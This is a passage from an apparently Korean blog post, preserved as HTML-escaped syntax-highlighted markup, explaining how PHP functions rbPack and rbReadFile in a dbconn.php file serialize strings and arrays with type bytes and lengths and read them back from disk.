class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a9d336357845-10&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a9d336357845-11&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;rbPack function in dbconn.php&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;데이터를 패킹하는 rbPack 함수의 구조는 간단합니다. 여기서 dbconn.php 상단부에서 정의한 STR과 ARR 상수가 사용되는데, 이는 각각 0x01, 0x02입니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;1. 만약 데이터가 string일 경우 0x01, 길이, 데이터의 형태로 저장이 됩니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;2. 만약 데이터가 array일 경우 0x02, 배열의 갯수, …의 형태로 저장이 됩니다. 이 때 rbPack 함수가 재귀적으로 호출되기 때문에 뒤따라오는 데이터가 string일 경우 1번으로 갈 것이고, array일 경우 다시 2번을 수행하겠죠.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif; text-align: center;&quot;&gt;&lt;span class=&quot;imageblock&quot; style=&quot;display: inline-block; width: 712px; text-align: center;; height: auto; max-width: 100%;&quot;&gt;&lt;img src=&quot;https://t1.daumcdn.net/cfile/tistory/9940A6405C6774CA06&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F9940A6405C6774CA06&quot; width=&quot;712&quot; height=&quot;121&quot; filename=&quot;3.png&quot; filemime=&quot;image/jpeg&quot; style=&quot;text-align: center;&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;저희는 이를 확인하기 위해 직접 서버를 구축하여 테스트를 진행하였습니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;쉽게 그림으로 설명하자면 빨간색은 데이터 타입(0x01은 string, 0x02는 array), 초록색은 배열의 갯수, 주황색은 string의 길이, 노란색은 data가 될 것입니다.&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;그럼 다음으로 rbReadFile을 살펴보죠.&lt;/p&gt;&lt;div id=&quot;crayon-5c677473e1aa1026752802&quot; class=&quot;crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate&quot; data-settings=&quot; minimize scroll-mouseover&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; text-size-adjust: none; width: 750px; padding: 0px; margin: 12px 0px; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace; color: rgb(60, 72, 88); height: auto; overflow: hidden !important; position: relative !important; direction: ltr !important; border: 1px solid rgb(222, 222, 222) !important; background-color: rgb(248, 248, 255) !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-plain-wrap form-group&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; position: relative; background: 0px center; border: 0px; margin: 0px !important; padding: 0px !important; height: auto !important;&quot;&gt;&lt;textarea wrap=&quot;soft&quot; class=&quot;crayon-plain print-no form-control&quot; data-settings=&quot;dblclick&quot; readonly=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; color: rgb(0, 0, 0); font-style: inherit; font-variant: inherit; font-stretch: inherit; margin: 0px 0px 7px; overflow: hidden; max-width: 100%; padding-top: 0px; padding-right: 5px; padding-left: 5px; display: block; width: 748px; height: 0px; background: linear-gradient(rgb(156, 39, 176), rgb(156, 39, 176)) center bottom / 0px 2px no-repeat, linear-gradient(rgb(210, 210, 210), rgb(210, 210, 210)) center calc(100% - 1px) / 100% 1px transparent; border-width: 0px; border-style: initial; border-color: initial; border-radius: 0px; box-shadow: none; transition: background 0s ease-out 0s; float: none; vertical-align: middle; resize: none; position: absolute; opacity: 0; white-space: pre; overflow-wrap: normal; tab-size: 4; z-index: 0; font-size: 12px !important; line-height: 15px !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important;&quot;&gt;&lt;/textarea&gt;&lt;/div&gt;&lt;div class=&quot;crayon-main&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding: 0px; margin: 0px; width: 748px; overflow: hidden; position: relative; z-index: 1;&quot;&gt;&lt;table class=&quot;crayon-table&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-size: 18px; margin-left: 0px; border-collapse: collapse !important; border-spacing: 0px !important; background: none !important; width: auto !important; border: none !important; padding: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-top: 0px !important; table-layout: auto !important;&quot;&gt;&lt;tbody style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;&lt;tr class=&quot;crayon-row&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: none !important; padding: 0px !important; vertical-align: top !important; margin: 0px !important;&quot;&gt;&lt;td class=&quot;crayon-nums &quot; data-settings=&quot;show&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important;&quot;&gt;&lt;div class=&quot;crayon-nums-content&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: nowrap; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa1026752802-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;1&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa1026752802-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;2&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa1026752802-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;3&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa1026752802-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;4&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa1026752802-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;5&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa1026752802-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;6&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;crayon-code&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background: 0px center; width: 729.6px;&quot;&gt;&lt;div class=&quot;crayon-pre&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: pre; overflow: visible; tab-size: 4; background: none !important; border: none !important; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa1026752802-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbReadFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa1026752802-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$opened&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;fopen&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;r&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;or&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;die&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Unable to open file!&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa1026752802-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$content&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;fread&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$opened&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;filesize&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa1026752802-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;fclose&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$opened&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa1026752802-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbParse&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit 